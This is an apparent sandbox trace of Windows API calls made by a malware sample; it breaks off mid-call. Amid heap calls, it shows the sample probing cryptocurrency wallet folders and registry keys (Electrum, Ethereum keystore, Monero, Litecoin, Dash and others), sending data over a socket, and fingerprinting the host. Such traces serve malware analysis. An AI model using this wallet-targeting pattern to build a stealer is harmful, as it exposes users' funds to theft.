GetProcessHeap () returned 0x2b0000 [0220.506] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x40) returned 0x2c7908 [0220.507] GetProcessHeap () returned 0x2b0000 [0220.507] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc458 [0220.507] GetProcessHeap () returned 0x2b0000 [0220.507] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x44) returned 0x2c6680 [0220.507] GetProcessHeap () returned 0x2b0000 [0220.507] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c6680, Size=0x88) returned 0x2e6040 [0220.507] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\atomic\\Local Storage\\leveldb\\" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\atomic\\local storage\\leveldb"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2200000, hTemplateFile=0x0) returned 0xffffffff [0220.507] GetLastError () returned 0x3 [0220.507] GetProcessHeap () returned 0x2b0000 [0220.507] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6040 | out: hHeap=0x2b0000) returned 1 [0220.507] GetProcessHeap () returned 0x2b0000 [0220.507] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x40) returned 0x2c78c0 [0220.507] GetProcessHeap () returned 0x2b0000 [0220.507] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c7908 | out: hHeap=0x2b0000) returned 1 [0220.507] GetProcessHeap () returned 0x2b0000 [0220.507] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c78c0 | out: hHeap=0x2b0000) returned 1 [0220.507] GetProcessHeap () returned 0x2b0000 [0220.507] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6) returned 0x2f08a0 [0220.507] GetProcessHeap () returned 0x2b0000 [0220.508] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c69a0 | out: hHeap=0x2b0000) returned 1 [0220.508] GetProcessHeap () returned 0x2b0000 [0220.508] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f08b0 | out: hHeap=0x2b0000) returned 1 [0220.508] GetProcessHeap () returned 0x2b0000 [0220.513] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfc80 | out: hHeap=0x2b0000) returned 1 [0220.513] GetProcessHeap () returned 0x2b0000 [0220.513] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1c) returned 0x2cfc80 [0220.514] GetProcessHeap () returned 0x2b0000 [0220.514] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1a) returned 0x2cfd98 [0220.514] GetProcessHeap () returned 0x2b0000 [0220.514] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f08b0 [0220.514] GetProcessHeap () returned 0x2b0000 [0220.514] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08b0, Size=0x3) returned 0x2f08c0 [0220.514] GetProcessHeap () returned 0x2b0000 [0220.515] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20) returned 0x2cfca8 [0220.515] GetProcessHeap () returned 0x2b0000 [0220.515] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1a) returned 0x2cfd70 [0220.515] GetProcessHeap () returned 0x2b0000 [0220.515] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6) returned 0x2f08b0 [0220.515] GetProcessHeap () returned 0x2b0000 [0220.515] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08b0, Size=0xc) returned 0x2f5280 [0220.515] GetProcessHeap () returned 0x2b0000 [0220.515] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f5280, Size=0x18) returned 0x2cf0f0 [0220.515] SetLastError (dwErrCode=0x0) [0220.515] GetEnvironmentVariableW (in: lpName="appdata", lpBuffer=0x27e3d0, nSize=0x200 | out: lpBuffer="") returned 0x22 [0220.515] GetProcessHeap () returned 0x2b0000 [0220.515] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc458 [0220.515] GetProcessHeap () returned 0x2b0000 [0220.515] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cf0f0 | out: hHeap=0x2b0000) returned 1 [0220.516] GetProcessHeap () returned 0x2b0000 [0220.516] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc4e8 [0220.516] GetProcessHeap () returned 0x2b0000 [0220.516] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc4e8, Size=0x44) returned 0x2c69a0 [0220.516] GetProcessHeap () returned 0x2b0000 [0220.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfd70 | out: hHeap=0x2b0000) returned 1 [0220.516] GetProcessHeap () returned 0x2b0000 [0220.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc458 | out: hHeap=0x2b0000) returned 1 [0220.516] GetProcessHeap () returned 0x2b0000 [0220.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfca8 | out: hHeap=0x2b0000) returned 1 [0220.516] GetProcessHeap () returned 0x2b0000 [0220.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfd98 | out: hHeap=0x2b0000) returned 1 [0220.516] GetProcessHeap () returned 0x2b0000 [0220.516] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x33) returned 0x2eb3e8 [0220.517] GetProcessHeap () returned 0x2b0000 [0220.517] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1c) returned 0x2cfd98 [0220.517] GetProcessHeap () returned 0x2b0000 [0220.517] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cfd98, Size=0x38) returned 0x2eb4a8 [0220.517] GetProcessHeap () returned 0x2b0000 [0220.517] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4a8, Size=0x70) returned 0x2d40d0 [0220.517] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Electrum\\wallets" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\electrum\\wallets"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2200000, hTemplateFile=0x0) returned 0xffffffff [0220.517] GetLastError () returned 0x3 [0220.517] GetProcessHeap () returned 0x2b0000 [0220.517] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d40d0 | out: hHeap=0x2b0000) returned 1 [0220.517] GetProcessHeap () returned 0x2b0000 [0220.517] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x33) returned 0x2eb4a8 [0220.517] GetProcessHeap () returned 0x2b0000 [0220.517] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb3e8 | out: hHeap=0x2b0000) returned 1 [0220.518] GetProcessHeap () returned 0x2b0000 [0220.518] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb4a8 | out: hHeap=0x2b0000) returned 1 [0220.518] GetProcessHeap () returned 0x2b0000 [0220.518] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f08b0 [0220.518] GetProcessHeap () returned 0x2b0000 [0220.518] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c69a0 | out: hHeap=0x2b0000) returned 1 [0220.518] GetProcessHeap () returned 0x2b0000 [0220.518] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f08c0 | out: hHeap=0x2b0000) returned 1 [0220.518] GetProcessHeap () returned 0x2b0000 [0220.518] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfc80 | out: hHeap=0x2b0000) returned 1 [0220.518] GetProcessHeap () returned 0x2b0000 [0220.518] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x3022b8, Size=0xc0) returned 0x3032b8 [0220.518] GetProcessHeap () returned 0x2b0000 [0220.518] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1c) returned 0x2cfc80 [0220.518] GetProcessHeap () returned 0x2b0000 [0220.518] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xf) returned 0x2f5280 [0220.519] GetProcessHeap () returned 0x2b0000 [0220.519] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f08c0 [0220.519] GetProcessHeap () returned 0x2b0000 [0220.519] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08c0, Size=0x3) returned 0x2f08d0 [0220.519] GetProcessHeap () returned 0x2b0000 [0220.519] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20) returned 0x2cfd98 [0220.519] GetProcessHeap () returned 0x2b0000 [0220.519] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xf) returned 0x2f5298 [0220.519] GetProcessHeap () returned 0x2b0000 [0220.519] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6) returned 0x2f08c0 [0220.519] GetProcessHeap () returned 0x2b0000 [0220.519] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08c0, Size=0xc) returned 0x2f5268 [0220.519] GetProcessHeap () returned 0x2b0000 [0220.519] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f5268, Size=0x18) returned 0x2cf0f0 [0220.519] SetLastError (dwErrCode=0x0) [0220.519] GetEnvironmentVariableW (in: lpName="appdata", lpBuffer=0x27e3d0, nSize=0x200 | out: lpBuffer="") returned 0x22 [0220.519] GetProcessHeap () returned 0x2b0000 [0220.519] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc458 [0220.520] GetProcessHeap () returned 0x2b0000 [0220.520] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cf0f0 | out: hHeap=0x2b0000) returned 1 [0220.520] GetProcessHeap () returned 0x2b0000 [0220.520] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc4e8 [0220.520] GetProcessHeap () returned 0x2b0000 [0220.520] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc4e8, Size=0x44) returned 0x2c69a0 [0220.520] GetProcessHeap () returned 0x2b0000 [0220.520] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5298 | out: hHeap=0x2b0000) returned 1 [0220.520] GetProcessHeap () returned 0x2b0000 [0220.520] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc458 | out: hHeap=0x2b0000) returned 1 [0220.520] GetProcessHeap () returned 0x2b0000 [0220.520] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfd98 | out: hHeap=0x2b0000) returned 1 [0220.521] GetProcessHeap () returned 0x2b0000 [0220.521] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5280 | out: hHeap=0x2b0000) returned 1 [0220.521] GetProcessHeap () returned 0x2b0000 [0220.521] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x28) returned 0x2dc458 [0220.521] GetProcessHeap () returned 0x2b0000 [0220.521] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x16) returned 0x2cf0f0 [0220.521] GetProcessHeap () returned 0x2b0000 [0220.521] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cf0f0, Size=0x2c) returned 0x2ec3f0 [0220.521] GetProcessHeap () returned 0x2b0000 [0220.521] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ec3f0, Size=0x58) returned 0x2e1620 [0220.521] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Zcash" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\zcash"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2200000, hTemplateFile=0x0) returned 0xffffffff [0220.521] GetLastError () returned 0x2 [0220.521] GetProcessHeap () returned 0x2b0000 [0220.521] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e1620 | out: hHeap=0x2b0000) returned 1 [0220.522] GetProcessHeap () returned 0x2b0000 [0220.522] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x28) returned 0x2dc4e8 [0220.522] GetProcessHeap () returned 0x2b0000 [0220.522] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc458 | out: hHeap=0x2b0000) returned 1 [0220.522] GetProcessHeap () returned 0x2b0000 [0220.522] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc4e8 | out: hHeap=0x2b0000) returned 1 [0220.522] GetProcessHeap () returned 0x2b0000 [0220.522] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5) returned 0x2f08c0 [0220.522] GetProcessHeap () returned 0x2b0000 [0220.522] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c69a0 | out: hHeap=0x2b0000) returned 1 [0220.522] GetProcessHeap () returned 0x2b0000 [0220.522] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f08d0 | out: hHeap=0x2b0000) returned 1 [0220.522] GetProcessHeap () returned 0x2b0000 [0220.522] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfc80 | out: hHeap=0x2b0000) returned 1 [0220.522] GetProcessHeap () returned 0x2b0000 [0220.522] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1c) returned 0x2cfc80 [0220.523] GetProcessHeap () returned 0x2b0000 [0220.523] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x12) returned 0x2cf0f0 [0220.523] GetProcessHeap () returned 0x2b0000 [0220.523] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f08d0 [0220.523] GetProcessHeap () returned 0x2b0000 [0220.523] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20) returned 0x2cfd98 [0220.523] GetProcessHeap () returned 0x2b0000 [0220.523] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x12) returned 0x2cefd0 [0220.523] GetProcessHeap () returned 0x2b0000 [0220.523] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6) returned 0x2f08e0 [0220.523] GetProcessHeap () returned 0x2b0000 [0220.524] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08e0, Size=0xc) returned 0x2f5280 [0220.524] GetProcessHeap () returned 0x2b0000 [0220.524] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f5280, Size=0x18) returned 0x2ceff0 [0220.524] SetLastError (dwErrCode=0x0) [0220.524] GetEnvironmentVariableW (in: lpName="appdata", lpBuffer=0x27e3d0, nSize=0x200 | out: lpBuffer="") returned 0x22 [0220.524] GetProcessHeap () returned 0x2b0000 [0220.524] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc4e8 [0220.524] GetProcessHeap () returned 0x2b0000 [0220.524] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ceff0 | out: hHeap=0x2b0000) returned 1 [0220.524] GetProcessHeap () returned 0x2b0000 [0220.524] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc458 [0220.524] GetProcessHeap () returned 0x2b0000 [0220.524] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x44) returned 0x2c69a0 [0220.525] GetProcessHeap () returned 0x2b0000 [0220.525] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cefd0 | out: hHeap=0x2b0000) returned 1 [0220.525] GetProcessHeap () returned 0x2b0000 [0220.525] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc4e8 | out: hHeap=0x2b0000) returned 1 [0220.525] GetProcessHeap () returned 0x2b0000 [0220.525] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfd98 | out: hHeap=0x2b0000) returned 1 [0220.525] GetProcessHeap () returned 0x2b0000 [0220.525] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cf0f0 | out: hHeap=0x2b0000) returned 1 [0220.525] GetProcessHeap () returned 0x2b0000 [0220.525] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x2b) returned 0x2ec3f0 [0220.525] GetProcessHeap () returned 0x2b0000 [0220.525] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x2cf0f0 [0220.525] GetProcessHeap () returned 0x2b0000 [0220.525] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cf0f0, Size=0x30) returned 0x2ec460 [0220.525] GetProcessHeap () returned 0x2b0000 [0220.525] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ec460, Size=0x60) returned 0x3022b8 [0220.526] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\bytecoin" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\bytecoin"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2200000, hTemplateFile=0x0) returned 0xffffffff [0220.526] GetLastError () returned 0x2 [0220.526] GetProcessHeap () returned 0x2b0000 [0220.526] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3022b8 | out: hHeap=0x2b0000) returned 1 [0220.526] GetProcessHeap () returned 0x2b0000 [0220.526] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x2b) returned 0x2ec460 [0220.526] GetProcessHeap () returned 0x2b0000 [0220.526] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ec3f0 | out: hHeap=0x2b0000) returned 1 [0220.526] GetProcessHeap () returned 0x2b0000 [0220.526] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ec460 | out: hHeap=0x2b0000) returned 1 [0220.526] GetProcessHeap () returned 0x2b0000 [0220.526] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f08e0 [0220.526] GetProcessHeap () returned 0x2b0000 [0220.526] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c69a0 | out: hHeap=0x2b0000) returned 1 [0220.526] GetProcessHeap () returned 0x2b0000 [0220.527] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f08d0 | out: hHeap=0x2b0000) returned 1 [0220.527] GetProcessHeap () returned 0x2b0000 [0220.527] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfc80 | out: hHeap=0x2b0000) returned 1 [0220.527] GetProcessHeap () returned 0x2b0000 [0220.527] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1c) returned 0x2cfc80 [0220.527] GetProcessHeap () returned 0x2b0000 [0220.527] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1b) returned 0x2cfd98 [0220.527] GetProcessHeap () returned 0x2b0000 [0220.527] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f08d0 [0220.527] GetProcessHeap () returned 0x2b0000 [0220.527] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20) returned 0x2cfca8 [0220.527] GetProcessHeap () returned 0x2b0000 [0220.527] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1b) returned 0x2cfd70 [0220.528] GetProcessHeap () returned 0x2b0000 [0220.528] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6) returned 0x2f08f0 [0220.528] GetProcessHeap () returned 0x2b0000 [0220.528] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08f0, Size=0xc) returned 0x2f5280 [0220.528] GetProcessHeap () returned 0x2b0000 [0220.528] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f5280, Size=0x18) returned 0x2cf0f0 [0220.528] SetLastError (dwErrCode=0x0) [0220.528] GetEnvironmentVariableW (in: lpName="appdata", lpBuffer=0x27e3d0, nSize=0x200 | out: lpBuffer="") returned 0x22 [0220.528] GetProcessHeap () returned 0x2b0000 [0220.528] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc4e8 [0220.528] GetProcessHeap () returned 0x2b0000 [0220.528] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cf0f0 | out: hHeap=0x2b0000) returned 1 [0220.528] GetProcessHeap () returned 0x2b0000 [0220.528] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc458 [0220.529] GetProcessHeap () returned 0x2b0000 [0220.529] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc458, Size=0x44) returned 0x2c69a0 [0220.529] GetProcessHeap () returned 0x2b0000 [0220.529] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfd70 | out: hHeap=0x2b0000) returned 1 [0220.529] GetProcessHeap () returned 0x2b0000 [0220.529] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc4e8 | out: hHeap=0x2b0000) returned 1 [0220.529] GetProcessHeap () returned 0x2b0000 [0220.529] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfca8 | out: hHeap=0x2b0000) returned 1 [0220.529] GetProcessHeap () returned 0x2b0000 [0220.529] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfd98 | out: hHeap=0x2b0000) returned 1 [0220.530] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Ethereum\\keystore" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\ethereum\\keystore"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2200000, hTemplateFile=0x0) returned 0xffffffff [0220.530] GetLastError () returned 0x3 [0220.530] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\monero-project\\monero-core", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x0) returned 0x2 [0220.531] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Litecoin\\Litecoin-Qt", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x0) returned 0x2 [0220.533] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Dash\\Dash-Qt", ulOptions=0x0, samDesired=0x1, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x0) returned 0x2 [0220.533] send (s=0x300, buf=0x2f51d8*, len=4, flags=0) returned 4 [0220.534] send (s=0x300, buf=0x2f51dc*, len=5, flags=0) returned 5 [0220.534] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop" (normalized: "c:\\users\\keecfmwgj\\desktop"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2200000, hTemplateFile=0x0) returned 0x304 [0220.535] send (s=0x300, buf=0x2f51d8*, len=4, flags=0) returned 4 [0220.536] send (s=0x300, buf=0x2f51dc*, len=5, flags=0) returned 5 [0221.120] send (s=0x300, buf=0x2dc4e8*, len=17, flags=0) returned 17 [0221.120] send (s=0x300, buf=0x2dc4f9*, len=17, flags=0) returned 17 [0221.123] GetComputerNameW (in: lpBuffer=0x27f2e0, nSize=0x27ecb8 | out: lpBuffer="Q9IATRKPRH", nSize=0x27ecb8) returned 1 [0221.124] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x101, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x2e4) returned 0x0 [0221.124] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ProductName", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x57, lpcbData=0x27e7e8*=0x2e) returned 0x0 [0221.124] RegCloseKey (hKey=0x2e4) returned 0x0 [0221.125] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", ulOptions=0x0, samDesired=0x101, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x2e4) returned 0x0 [0221.125] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ProcessorNameString", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x49, lpcbData=0x27e7e8*=0x50) returned 0x0 [0221.125] RegCloseKey (hKey=0x2e4) returned 0x0 [0221.125] GetWindowRect (in: hWnd=0x10010, lpRect=0x27e888 | out: lpRect=0x27e888) returned 1 [0221.126] GetProcessHeap () returned 0x2b0000 [0221.126] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb) returned 0x2f52e0 [0221.126] GetProcessHeap () returned 0x2b0000 [0221.126] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x16) returned 0x2ceff0 [0221.126] GetProcessHeap () returned 0x2b0000 [0221.126] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2e6040, Size=0x150) returned 0x2cd798 [0221.127] GetProcessHeap () returned 0x2b0000 [0221.127] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ceff0 | out: hHeap=0x2b0000) returned 1 [0221.127] GetSystemInfo (in: lpSystemInfo=0x27ea20 | out: lpSystemInfo=0x27ea20*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0221.127] GetProcessHeap () returned 0x2b0000 [0221.127] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa) returned 0x2f52e0 [0221.127] GetProcessHeap () returned 0x2b0000 [0221.127] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x14) returned 0x2ceff0 [0221.127] GetProcessHeap () returned 0x2b0000 [0221.128] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ceff0 | out: hHeap=0x2b0000) returned 1 [0221.128] GlobalMemoryStatusEx (in: lpBuffer=0x27e9b8 | out: lpBuffer=0x27e9b8) returned 1 [0221.128] GetProcessHeap () returned 0x2b0000 [0221.128] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f08f0 [0221.128] GetProcessHeap () returned 0x2b0000 [0221.128] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08f0, Size=0x10) returned 0x2f52e0 [0221.128] GetProcessHeap () returned 0x2b0000 [0221.128] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f52e0 | out: hHeap=0x2b0000) returned 1 [0221.129] EnumDisplayDevicesW (in: lpDevice=0x0, iDevNum=0x0, lpDisplayDevice=0x27ef40, dwFlags=0x1 | out: lpDisplayDevice=0x27ef40) returned 1 [0221.130] GetProcessHeap () returned 0x2b0000 [0221.130] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x3c) returned 0x2c79e0 [0221.130] GetProcessHeap () returned 0x2b0000 [0221.131] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xe) returned 0x2f52e0 [0221.131] GetProcessHeap () returned 0x2b0000 [0221.131] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x1c) returned 0x2ecb08 [0221.131] GetProcessHeap () returned 0x2b0000 [0221.131] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ecb08, Size=0x38) returned 0x2eb4a8 [0221.131] GetProcessHeap () returned 0x2b0000 [0221.131] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1d) returned 0x2ecb08 [0221.131] GetProcessHeap () returned 0x2b0000 [0221.131] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb4a8 | out: hHeap=0x2b0000) returned 1 [0221.131] GetProcessHeap () returned 0x2b0000 [0221.131] HeapFree 